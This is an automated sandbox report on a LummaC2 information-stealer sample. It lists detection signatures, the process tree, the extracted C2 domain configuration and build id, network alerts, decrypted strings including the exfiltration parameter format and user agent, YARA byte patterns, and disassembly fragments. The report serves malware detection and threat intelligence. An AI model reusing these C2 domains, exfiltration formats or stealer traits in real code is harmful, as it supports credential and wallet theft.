Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DLKs2Qeljg.exe

Overview

General Information

Sample name:DLKs2Qeljg.exe
renamed because original name is a hash value
Original sample name:7b98863009146a47f1100922be254455.exe
Analysis ID:1586502
MD5:7b98863009146a47f1100922be254455
SHA1:b808c2c611317cfe78a213c44e9b8fb5a8c00a45
SHA256:e069cfbb5772d73a5cd15889c0482ff01dbd29bf719d977269c6754eef917672
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DLKs2Qeljg.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\DLKs2Qeljg.exe" MD5: 7B98863009146A47F1100922BE254455)
    • 67E6.tmp.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Local\Temp\67E6.tmp.exe" MD5: D66791DB5C8D7BF392361E2343F7A5EA)
      • WerFault.exe (PID: 1344 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["versersleep.shop", "apporholis.shop", "robinsharez.shop", "chipdonkeruz.shop", "skidjazzyric.click", "crowdwarek.shop", "handscreamny.shop", "femalsabler.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.1945775576.0000000000560000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1418:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        Click to see the 4 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:34:15.334966+010020283713Unknown Traffic192.168.2.449732104.21.48.1443TCP
        2025-01-09T08:34:16.443012+010020283713Unknown Traffic192.168.2.449733104.21.48.1443TCP
        2025-01-09T08:34:17.646912+010020283713Unknown Traffic192.168.2.449734104.21.48.1443TCP
        2025-01-09T08:34:19.151525+010020283713Unknown Traffic192.168.2.449735104.21.48.1443TCP
        2025-01-09T08:34:20.375081+010020283713Unknown Traffic192.168.2.449736104.21.48.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:34:15.694393+010020546531A Network Trojan was detected192.168.2.449732104.21.48.1443TCP
        2025-01-09T08:34:16.927163+010020546531A Network Trojan was detected192.168.2.449733104.21.48.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:34:15.694393+010020498361A Network Trojan was detected192.168.2.449732104.21.48.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:34:16.927163+010020498121A Network Trojan was detected192.168.2.449733104.21.48.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:34:18.278515+010020480941Malware Command and Control Activity Detected192.168.2.449734104.21.48.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:34:11.448735+010028032742Potentially Bad Traffic192.168.2.449730104.21.56.70443TCP
        2025-01-09T08:34:13.220209+010028032742Potentially Bad Traffic192.168.2.449731176.113.115.1980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: DLKs2Qeljg.exeAvira: detected
        Source: https://skidjazzyric.click/apiAvira URL Cloud: Label: malware
        Source: https://skidjazzyric.click/Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE4Avira URL Cloud: Label: malware
        Source: skidjazzyric.clickAvira URL Cloud: Label: malware
        Source: https://skidjazzyric.click/apiOAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/Avira URL Cloud: Label: malware
        Source: https://skidjazzyric.click:443/apiAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: 1.3.67E6.tmp.exe.2140000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["versersleep.shop", "apporholis.shop", "robinsharez.shop", "chipdonkeruz.shop", "skidjazzyric.click", "crowdwarek.shop", "handscreamny.shop", "femalsabler.shop", "soundtappysk.shop"], "Build id": "4h5VfH--"}
        Source: DLKs2Qeljg.exeReversingLabs: Detection: 55%
        Source: DLKs2Qeljg.exeVirustotal: Detection: 38%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeJoe Sandbox ML: detected
        Source: DLKs2Qeljg.exeJoe Sandbox ML: detected
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: robinsharez.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: handscreamny.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: chipdonkeruz.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: versersleep.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: crowdwarek.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: apporholis.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: femalsabler.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: soundtappysk.shop
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: skidjazzyric.click
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
        Source: 00000001.00000002.1945700743.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00415720 CryptUnprotectData,1_2_00415720

        Compliance

        barindex
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeUnpacked PE file: 0.2.DLKs2Qeljg.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeUnpacked PE file: 1.2.67E6.tmp.exe.400000.0.unpack
        Source: DLKs2Qeljg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx1_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov edx, ecx1_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov esi, ecx1_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h1_2_00419840
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]1_2_0040A05C
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h1_2_00427070
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_0042D830
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h1_2_0043F0E0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041B882
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then jmp eax1_2_004418A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041B173
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0041A900
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041B184
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then test esi, esi1_2_0043C9A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al1_2_0041B243
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042EA62
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]1_2_00402210
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0040AA32
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]1_2_00425AF0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00428280
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]1_2_0041F2A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebx, eax1_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebp, eax1_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, edx1_2_0040B2B0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042EB5F
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042BB00
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041BB21
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h1_2_00441B20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0041AB2A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]1_2_0040C334
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]1_2_0040C3EC
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebx, edx1_2_0042DBF0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then jmp ecx1_2_0040D334
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00422380
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]1_2_0041BBA0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h1_2_0042BBA0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042EBA1
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00440BAB
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042EBB3
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h1_2_00441BB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h1_2_00441C40
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00442470
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h1_2_00426C76
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov eax, edi1_2_0041C400
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], al1_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]1_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov edx, ecx1_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00414C20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h1_2_0044042D
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_0044042D
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0041B484
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov word ptr [esi], cx1_2_00427490
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h1_2_00425D6A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00438520
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh1_2_00442D20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then push edi1_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]1_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_0042B652
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0041B667
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]1_2_00418672
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00409E09
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then jmp ecx1_2_0040CEC7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]1_2_00416ED0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]1_2_0041BEE1
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0041AEFF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]1_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]1_2_00408F90
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh1_2_004427B0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]1_2_020FE249
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl1_2_020FE249
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]1_2_020FA2C3
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h1_2_0212F347
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0210B3DA
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0210B3EB
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_020FA070
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov esi, ecx1_2_021060EF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then jmp ecx1_2_020FD12E
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]1_2_02107137
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]1_2_0210C148
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0210B166
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]1_2_020F91F7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h1_2_021321EA
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then jmp ecx1_2_020FD59B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov eax, edi1_2_0210C667
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h1_2_02130694
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_02130694
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_021326D7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov word ptr [esi], cx1_2_021176F7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0210B6EB
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], al1_2_0210773F
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_02128787
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]1_2_020F2477
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al1_2_0210B4AA
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_021184E7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]1_2_0210F507
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]1_2_020FC59B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_021125E7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh1_2_02132A17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, edx1_2_020FBA6C
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_0211DA97
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h1_2_02109AA7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx1_2_0212BAD7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov edx, ecx1_2_0212BAD7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]1_2_02107AE4
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov edx, ecx1_2_02107AE4
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0210BAE9
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_0210AB67
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h1_2_02116BA7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then push edi1_2_0212C807
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]1_2_0212C807
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]1_2_02108809
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_020F7887
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_020F7887
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_0211B8B5
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_021058FA
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_02130E12
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0211EE1A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h1_2_0211BE07
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0211EE08
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]1_2_0210BE2C
